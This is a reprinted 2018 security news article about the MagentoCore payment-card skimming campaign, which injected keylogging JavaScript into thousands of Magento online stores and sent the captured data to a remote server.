This article originally appeared in SC Magazine on September 5, 2018.
Over the last six months, a recently discovered, highly prolific payment card-scraping campaign managed to infect more than 7,000 online stores running on the open-source Magento e-commerce software platform.
“The vulnerabilities might lie in the web application source code, enabling bad actors to manipulate the code and inject rogue script into the HTML template. The script then logs keystrokes and sends them to a command-and-control server.”
In an Aug. 30 blog post, Dutch security researcher Willem de Groot reported that the operation involved online payment skimming malware called MagentoCore. Of the 7,339 e-shops found to be impacted, at least 1,450 of them were infected for the entire half-year period the threat has existed.
De Groot further explained that MagentoCore skimmers “gain illicit access to the control panel of an e-commerce site, often with brute force techniques,” then embed Javascript into the HTML template. The malicious script records keystrokes and “sends everything in real-time to the magentocore.net server, registered in Moscow.”
Additionally, the malware also inserts a backdoor for periodic downloads, removes competing malware, and changes the passwords of common staff user names.
In the two weeks preceding the researcher’s post, the attackers were infecting websites at a clip of 50 to 60 stores per day, according to de Groot.
“Magento is an open-source platform and for this reason is also a favorite target of bad actors. This latest attack was likely carried out through password guessing and exploited vulnerabilities in Magento servers…” said Devon Merchant, digital security and operations manager at The Media Trust, in emailed comments. “The vulnerabilities might lie in the web application source code, enabling bad actors to manipulate the code and inject rogue script into the HTML template. The script then logs keystrokes and sends them to a command-and-control server.”